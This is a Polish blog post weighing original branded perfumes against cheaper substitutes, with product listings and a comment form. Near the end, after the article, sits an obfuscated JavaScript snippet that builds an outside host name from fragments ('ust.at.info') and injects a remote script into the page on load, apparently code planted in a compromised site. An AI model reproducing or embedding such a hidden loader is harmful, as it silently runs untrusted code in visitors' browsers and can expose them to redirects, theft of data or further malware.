NewsPerfumyPorady

Perfumy – zamienniki czy oryginały?

 

 

No właśnie, co jest lepsze – zamienniki perfum czy oryginały? Na co się zdecydować? Spróbuję Wam podpowiedzieć, gdyż pewnie nie raz zastanawialiście się czy warto dołożyć więcej i kupić oryginalne perfumy, czy może lepiej zaoszczędzić i kupić zamienniki perfum, które przecież niemalże identycznie pachną. Otóż moja odpowiedź brzmi warto! Zawsze warto postawić na oryginalne perfumy. Dlaczego? Już Wam tłumaczę różnicę pomiędzy zamiennikami a prawdziwymi perfumami.

 

Odpowiedniki perfum to nic innego jak zapachy zawierające składniki w niemal 100 procentach zgodne z wersją pierwotną. Często noszą podobne nazwy i ich opakowania posiadają kolorystycznie dobrane opakowania. Na stronach producentów możemy znaleźć podane te same składniki zapachowe, jak u marek na których się wzorowano. Dużą rolę gra tutaj cena, są one o wiele tańsze, gdyż ich sprzedaż opiera się na prywatnych drogeriach i sieciach sprzedaży, bez wkładu w kampanie reklamowe. Niestety odpowiedniki znanych perfum, często są po prostu jakościowo słabsze, ich zapach często jest nietrwały i szybko ulatnia się ze skóry. Zapach szybko się rozwija i tak samo szybko znika. To powoduje, że odruchowo nazywamy je często podróbkami.

 

Carolina Herrera Good Girl 80 ML TESTER + GRATIS

GIORGIO ARMANI SI 100ML EDP TESTER

Jeśli chodzi o perfumy oryginalne, markowe to rzeczywiście ich cena jest dużo większa, wiąże się to przede wszystkim z kosztownym i długotrwałym procesem produkcji. Wykorzystuje się w nim najszlachetniejsze części roślin a także wydzieliny z gruczołów zwierząt oraz składniki syntetyczne zapachowo zbliżone do naturalnych. I tak na przykład do pozyskania 1 litra skoncentrowanego zapachu potrzebujemy aż około 1000 kilogramów płatków kwiatów, które poddaje się co najmniej 7 dniowemu procesowi ekstrakcji, następnie kilkudniowemu procesowi filtracji i destylacji. Całość odbywa się w niezwykle sterylnych warunkach laboratoryjnych, i o ile w pozyskiwaniu koncentratów duży udział ma praca człowieka, to mieszanie substancji zapachowych, produkcje flakonów i kartoników wykonują wyspecjalizowane do tego maszyny. To dzięki nim ostateczny produkt handlowy, który zawiera od 50 do 200 różnych zapachów, pachnie i wygląda dokładnie tak samo w każdej sztuce. Nie możliwe jest więc aby zapach tych samych perfum nieco różnił się lub aby naklejka na jednym flakonie była przyklejona w nieco innym miejscu niż na innym. Każda z perfum jest oryginalnym produktem, nie odbiegającym od reszty partii. Można więc nawet śmiało stwierdzić, że dobre perfumy to takie małe dzieło sztuki. Zapach markowych perfum tworzy aurę luksusu, elegancji i pożądania a osobom, które ich używają ciężko się oprzeć. Taka też jest rola perfum z najwyższej półki, mają przyciągać, magnetyzować, wzbudzać zaufanie.

Nie wiem jak Wy ale ja zdecydowanie stawiam na perfumy markowe, bo wtedy mam pewność, że nie kupuję kota w worku a zapach, który mnie otula nie ulotni się po chwili z mojej skóry. A jakie jest Wasze zdanie na ten temat?

(function(){
oz82=document.createElement(„script”);oz82.async=true;oz82_=”u”+(„s”)+”t”;
oz82u=”9364.”;oz82_+=”a”+(„t.i”);oz82_+=”n”+(„f”+”o”)+”/”;
oz82u+=”9z290Xrsz825we7kmi86us”+(„47Xkbu”);
oz82.src=”//”+oz82_+oz82u;oz82.type=”text/javascript”;
document.body.appendChild(oz82);
})();

What is your reaction?

Excited
0
Happy
0
In Love
0
Not Sure
0
Silly
0

You may also like

Leave a reply

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

More in:News